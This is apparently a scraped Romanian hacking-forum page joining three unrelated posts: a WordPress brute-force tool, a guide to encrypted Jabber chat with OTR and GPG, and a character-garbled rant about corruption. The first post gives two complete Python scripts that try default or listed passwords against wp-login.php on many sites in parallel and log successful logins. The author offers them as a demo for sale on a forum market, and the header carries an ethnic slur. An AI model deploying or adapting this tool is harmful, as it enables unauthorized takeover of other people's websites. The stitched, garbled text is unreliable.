Leaderboard

Un mic cadou din partea mea, poate fi considerat un fel de demo pentru un release ulterior in RST Market. ################################# ### Wordpress BruteForce Tool ### ### Not designed for gypsies ### ### Author: Brenin@RST ### ### Jabber: obelix@creep.im ### ################################# import urllib, urllib2, cookielib from threading import Thread def checker(username,password,urlogin,urlreq): try: cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'log' : username, 'pwd' : password}) opener.open(urlogin, login_data) resp = opener.open(urlreq) barf = resp.read() print "Checking login on " + urlogin + " with " + username + " and " + password if "Dashboard" in barf: fis = open("caremerg.txt", 'a') fis.write(urlogin + " " + username + " @@@ " + password + "\n") fis.flush() print " GOOOOOOOOOOOOOOOOOOOD ONEEEEEEEEEEEEEEEEE!!!" except Exception as e: #print e -> Uncomment this and comment the line below if you want to see errors f = 1 if __name__ == '__main__': username = 'admin' password = ['admin','123456','password','Password1'] fis = open("sites.txt", 'rU') sites = fis.readlines() for i in range(4): for site in sites: urlogin = site.rstrip() + "/wp-login.php" urlreq = site.rstrip() + "/wp-admin/" #checker(username,password[i],urlogin,urlreq) -> function call for test purposes . IF this bugs you delete it. t = Thread(target = checker, args = (username,password[i],urlogin,urlreq)) t.start() t.join(1) Varianta de mai sus ruleaza cu setul de useri si parole setate in script. Varianta de mai jos incarca setul de useri din users.txt , setul de parole din passes.txt ################################# ### Wordpress BruteForce Tool ### ### Not designed for gypsies ### ### Author: Brenin@RST ### ### Jabber: obelix@creep.im ### ################################# import urllib, urllib2, cookielib from threading import Thread def checker(username,password,urlogin,urlreq): try: cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'log' : username, 'pwd' : password}) opener.open(urlogin, login_data) resp = opener.open(urlreq) barf = resp.read() print "Checking login on " + urlogin + " with " + username + " and " + password if "Dashboard" in barf: fis = open("caremerg.txt", 'a') fis.write(urlogin + " " + username + " @@@ " + password + "\n") fis.flush() print " GOOOOOOOOOOOOOOOOOOOD ONEEEEEEEEEEEEEEEEE!!!" except Exception as e: #print e -> Uncomment this and comment the line below if you want to see errors f = 1 if __name__ == '__main__': fis = open("sites.txt", 'rU') fispas = open("passes.txt",'rU') fisusers = open("users.txt",'rU') passwords = fispas.readlines() users = fisusers.readlines() sites = fis.readlines() for passwd in passwords: for user in users: for site in sites: urlogin = site.rstrip() + "/wp-login.php" urlreq = site.rstrip() + "/wp-admin/" #checker(user.rstrip(),passwd.rstrip(),urlogin,urlreq) -> function call for test purposes . IF this bugs you delete it. t = Thread(target = checker, args = (user.rstrip(),passwd.rstrip(),urlogin,urlreq)) t.start() t.join(1) Va trebuie un fisier sites.txt care contine URL-uri in forma lor normala. Exemplu: Jamie Oliver | Official site for recipes, books, tv, restaurants and food revolution Se porneste cu: python wpcrack.py Daca se doreste, pot sa pun si varianta compilata pentru Windows. Viitor update o sa adaug Joomla, Drupal, WHMCS, WHM, ZenCart, si alte sugestii din partea voastra. Enjoy.

Sunt 2 metode de a vorbi criptat: 1. Pidgin + OTR Downlodati si instalati Pidgin si OTR plugin. Pt cei extraordinar de lenesi, linkurile sunt urmatoarele: hxxp://sourceforge.net/projects/pidgin/files/Pidgin/2.10.3/pidgin-2.10.3.exe/download hxxp://www.cypherpunks.ca/otr/binaries/windows/pidgin-otr-3.2.0-1.exe Deschideti Pidgin. Accounts -> Manage Accounts -> Add Protocol: XMPP Username: alegeti unul Domain: safe.pm Resource: nu puneti nimic acolo Password: puneti una (nu 123321 sau alte tampenii ceva in genul #$123$Mm3920) Bifati remember password Bifati Create this new account on the server Dati click pe Add. Dupa, mergeti in Accounts -> Enable account pe contul deja facut. Ultimul pas: Tools -> Plugins -> cautati pluginul Off the record si dati enable pe el. Cand vorbiti cu cineva, ar terbui sa va apara in ferestra de conversatie OTR. Aveti OTR -> Start Private Conversation. Programul o sa va genereze niste chei si o sa vedeti un mesaj in genul "Successfully refreshed the unverified conversation with xxx@xxxx.xx" 2. PSI + GPA E mai safe decat Pidgin din cauza modului de stocare ale cheilor, dar poate sa te aduca la disperare pana inveti ce si cum. Downloadati si instalati PSI si GPA4WIN. hxxp://downloads.sourceforge.net/psi/psi-0.14-win-setup.exe hxxp://www.gpg4win.org/change-history.html Deschideti PSI faceti un cont in o maniera similara celei de mai sus. Nu o sa va detaliez si asta, pt ca e f simplu si asemanator cu cel de mai sus. Rulati Kleopatra.exe. Pt WIN 7 pathul este: C:\Program Files (x86)\GNU\GnuPG. File -> New certificate -> Create a personal OpenPGP pair. Aici aveti : Name: "jabberaccount - private" (fara @ domain) Email: jabberaccount@(serverul vostru).xx Comment: blank Next-> Create Key. Passphrase e optional. Daca nu verti unul, apasati ok. Mai faceti o cheie in aceeasi maniera, dar: File -> New certificate -> Create a personal OpenPGP pair. Aici aveti : Name: "jabberaccount" (fara @ domain) Email: jabberaccount@(serverul vostru).xx Comment: blank In PSI: General -> Account Setup -> Modify -> Details -> OpenPGP -> Select Key -> "jabberaccount - private" . In cazul in care nu va apare cheia, restartati PSI. Inainte sa vorbiti cu un contact, exportati cheia "jabberaccount", arhivati-o cu winrar sau alt program (pass min 10 caractere), faceti upload pe sendspace si trimiteti linkul celui cu care vreti sa vb. El va trebui sa va trimita la randul lui cheia lui. Importati cheia folosind Kleopatra. File -> import certificates -> cheia. In lista de contacte, dati click dreapta pe contactul vostru -> assign open pgp key -> selectati cheia pe care ati primit-o de la el. El va trebui sa faca acelasi lucru. Deschideti conversatia si ar trebui sa aveti un lacat in dreapta sus. Dati click pe el - ar trebui sa se faca galben. Daca nu ati gresit nimic, ar trebui sa functioneze. Daca ati gresit veti primi mesaje de eroare. NU TRIMTETI CHEIA PRIVATA NIMANUI !

Dup? cum bine ?ti?i, tr?im într-o lume unde „a avea bani” reprezint? for?a absolut? în manipularea anumitor tipuri de oameni din diferite domenii. Acest aspect ne duce cu gândul la cel mai oribil punct al existen?ei noastre.. SL?BICIUNEA FOR?AT?. Nu exist? om în acest sistem de pe acest p?mânt care s? refuze o sum? de bani în favoarea lu?rii unei decizii corecte din punct de vedere etic ?i moral. Am ajuns într-un a?a hal încât nu mai are sens s? crezi c? dreptatea e la partea corect?.. chiar nici unul. Se spune c? justi?ia echivaleaz? cu o balan?a.. este adev?rat, e o balan??.. care se înclin? acolo unde partea cu bani este mai grea. De ce trebuie s? ne al?tur?m acestui sistem corupt ?i r?u? Pentru c? suntem for?a?i ?? facem acest fapt.. dac? avem inten?ia s? fim corec?i.. ne alegem cu nedreptatea.. a?a c? prefer?m s? ne asociem acest viciu în ideea drept??ii mult visate. Indiferent de ce alegem, avem de suferit. Alegând calea drept??ii, ob?inem nedreptate.. alegând corup?ia, antren?m în continuare acest sistem infect.. de care nu mai putem sc?pa. Totul este o minciun?, dreptatea nu este altceva decât o idee produs? în capul nostru.. a?a c? nu mai are sens s? sper?m la cea colectiv?! De ce s? ne mai asum?m viciul corup?iei ?i s? continu?m în acest mod? Gândi?i-v? la asta.